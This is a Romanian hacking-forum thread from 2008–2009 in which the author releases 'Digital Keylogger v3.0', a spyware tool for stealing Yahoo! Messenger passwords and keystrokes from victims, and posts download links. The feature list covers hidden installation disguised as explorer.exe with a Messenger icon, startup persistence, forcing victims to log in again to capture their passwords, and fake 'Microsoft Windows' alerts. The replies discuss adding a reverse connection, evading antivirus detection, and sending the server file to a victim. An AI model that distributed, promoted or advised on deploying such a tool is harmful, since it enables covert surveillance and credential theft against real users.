Nytro Posted January 28, 2008 Report Posted January 28, 2008 :::: Digital Keylogger v3.0 :::::::: © Nytro 2008 :::::::: www.rstcenter.com ::::Digital Keylogger v3.0 :Made in RomaniaClient size : 912 KBServer size : 196 KBNew : Server captures all windows .Server :Copy file : C:\WINDOWS\system32\explorer.exeStarup : Yes , SystemDriverDisable Task Manager : NoHidden Install : YesIcon : Yahoo! MessengerNo "Missing file error" for client and server .Features :- Get keylog Automat : You set how fast to recive the keylog from server .- Get keylog Manual : Click "Get Keylog" to get the keylog from server .- Close Y! : You will close victim's Yahoo! Messenger , the victim will login , and you will get his password . Server will disable "Remember ID & Password" and "Auto-Login" options if they are activated .- Kill Server : The server will be deleted from victim's pc .- Send Message : You can send a message to your victim . Message type will be critical , the title will be "Microsoft Windows" .- Use Backspace : If you select Yes , if your victim press Backspace button , it will have an effect to your keylog . It will delete a char from keylog . If you select No , pressing Backsapce button , won't have any effect .- Save Log : You can save the keylog to your PC .- System Tray : The client will move to System Tray , behind the clock . Just move mouse over his icon to restore it .Thanx , Nytrowww.rstcenter.comScreenshot :Download :http://rapidshare.com/files/87242715/Digital_Keylogger_v3.0_by_Nytro.rarhttp://www.speedyshare.com/617551467.htmlhttp://uploaded.to/?id=xlp2fihttp://www.netdrive.ws/48170.htmlEnjoy
moubik Posted January 28, 2008 Report Posted January 28, 2008 am un mic request.atunci ca nu se foloseste backspace sa puna ceva in genul [bACKSPACE] in loc de nimic...adica nici nu sterge logul, dar nici nu trece neobservat
nike Posted January 28, 2008 Report Posted January 28, 2008 dar de ce nu ai putut sa l faci sa trimiti serverul si apoi sa se conecteze singur ? ... in rest good job
moubik Posted January 28, 2008 Report Posted January 28, 2008 dar de ce nu ai putut sa l faci sa trimiti serverul si apoi sa se conecteze singur ? ... in rest good job cum adica sa se conecteze singur ?adica reverse connection ?
Nytro Posted January 28, 2008 Author Report Posted January 28, 2008 Ok , cred ca voi pune sa afiseze [ Backspace ]Ca sa se conecteze direct e nevoie de IP , de IP tau , deci serverul trebuie editat . Si inca nu stiu sa fac . Trebuie deschis binar bla bla ... Cand o sa am mai mult timp o sa incerc si asta .
nike Posted January 28, 2008 Report Posted January 28, 2008 dar de ce nu ai putut sa l faci sa trimiti serverul si apoi sa se conecteze singur ? ... in rest good job cum adica sa se conecteze singur ?adica reverse connection ?da reverse connection... nu poate sa te ajute nimeni sa l faci ? ...de ce nu ceri ajutor ? ... bafta multa
Nytro Posted January 28, 2008 Author Report Posted January 28, 2008 Am avut si niste probleme de la Visual Basic , nu puteam face . Pai nu e chiar asa de usor , am ideea de la Slick , dar e mai greu de pus in practica .
avkhackteam Posted February 6, 2008 Report Posted February 6, 2008 sa faci reverse connection nu e chiar asa greu..ai mai multe optiuni problema e ..sa inveti sa faci server editor . Cauta pe net tutoriale sau intreaba-l pe Vladii.
Nytro Posted February 6, 2008 Author Report Posted February 6, 2008 Pai ideea de baza o stiu , nu stiu sa o pun in practica . Nu prea ma descurc cu fisierele . Deci deschid server binar si il impart intr-o matrice . Apoi trebuie unite elementele . Ceva de genu . Iar in server , la ce vreau sa editez , folosesc un delimitator , pe care il folosesc si in client pentru a imparti in matrice ...
avkhackteam Posted February 6, 2008 Report Posted February 6, 2008 hai k o sa caut eu un exemplu ceva... pt editor k nici eu nu am idee prea mare.am facut odata un editor pentru ceva dintr-un cod p kre l-am gasit pe un site dar problema si ce mai uimit p mn e ca ... editorul creat era detectabil dar ...executabilul kre l-am editat nu era in fine o sa revin cu un post
Nytro Posted February 6, 2008 Author Report Posted February 6, 2008 Daca gasesti ceva sa imi dai si mie . Nu stiu exact ce sa fac ...
Ras Posted March 21, 2008 Report Posted March 21, 2008 is mai n00b da ce face programu???deci sunt 2 .exe-uri1) client.exe 2) server.exeserver.exe il trimiti victimeiclient.exe il rulezi tu.dupa ce ruleaza victima te connectezi prin client la server (pui ip si dai connect) si porma ii aflii parola la mess si vezi tot ce tasteaza
candymanuu Posted March 22, 2008 Report Posted March 22, 2008 am si eu o singura intrebare: stie careva daca il depisteaza vreun AV ?
Nytro Posted March 22, 2008 Author Report Posted March 22, 2008 Sunbelt il depisteaza ca Digital Keylogger Nu sta prea bine la capitolul antivirusi ...http://www.virustotal.com/analisis/ea81588651149fb8551b4befba4efbc4
v3ctor Posted April 27, 2008 Report Posted April 27, 2008 ff tare programul multumim mult Nytro ( numa la nobi nu le merge)
Rebell Posted July 30, 2008 Report Posted July 30, 2008 intreb si ey ceva , trojan backdoor.vb.ayj cam asta imi arata antivirusul cand il scanez.. e periculos ptr comp meu trojanu asta?
rightclick Posted July 30, 2008 Report Posted July 30, 2008 ma tu esti prost sau prost daca este keylogger cum sa nu fie backdorsi Pc-ului tau nui face nimic
Rebell Posted July 30, 2008 Report Posted July 30, 2008 Ba fratilor luati`ma usor ca nu prea le am cu astea:))incepe si tu fraza frumos in plm ca eu n`am intrebat "ma prostule imi face virusdu ala ceva?"
punk3r Posted March 30, 2009 Report Posted March 30, 2009 Am pus IP-ul victimei.........am dat connect.......si imi zice error.......ori trebuia sai trimit ceva?
Nytro Posted March 30, 2009 Author Report Posted March 30, 2009 Vedeti si voi v3.3. Da, trebuie sa ii trimiti o felicitare. Trebuie sa trimiti serverul, logic.